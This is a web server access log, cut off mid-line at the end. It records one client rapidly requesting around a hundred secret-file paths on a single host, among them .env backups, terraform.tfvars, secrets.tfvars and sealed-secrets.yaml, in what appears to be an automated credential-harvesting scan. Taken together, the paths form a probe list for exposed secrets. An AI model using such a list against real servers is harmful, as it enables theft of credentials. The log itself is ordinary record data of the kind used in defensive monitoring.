200 200 - GET https net.profibot.hu "/.env.202508" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup5" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak4" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202504" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/sealed-secrets.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202507" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-09" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/secret.yaml" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202406" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202402" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old8" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202509" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.local" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.keys/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/override/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.secure/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/server/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/._env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/..env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/sveltekit/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/laravel/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/drupal/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 404 404 - GET https net.profibot.hu "/api/v2/.env" [Client 216.81.248.135] [Length 55] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/out/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/aws/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/hosting/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/v2/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/wp-content/plugins/woocommerce/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env~" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.cache/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/firebase/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/rest/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.firebase/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/cache/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/helm/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/charts/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/common/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/fastapi/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/graphql/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/vendor/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/cargo/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.copy" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.travis/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/payments/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.next/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.nuxt/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.stripe/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.azure/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.1" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.secrets/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.heroku/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.buildkite/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.001" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/private/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.docker.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/terraform.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_1" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.003" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.v11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/deployments/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/files/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2026" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/terraform.tfvars.json" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.009" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup.2026" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/config/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/cpanel/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/internal/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 404 404 - GET https net.profibot.hu "/api/v1/.env" [Client 216.81.248.135] [Length 55] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/app/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_12" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/system/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.sample" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.old2" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/static/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/backup/.env.2025" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env_2025" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/variables.tf" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/settings.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/backend/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/secrets.tfvars" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.backup13" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202501" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.gitlab/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-01" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.202503" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/docker.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak16" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-09" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025.bak" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:24 +0000] - 200 200 - GET https net.profibot.hu "/.env.2025-10" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 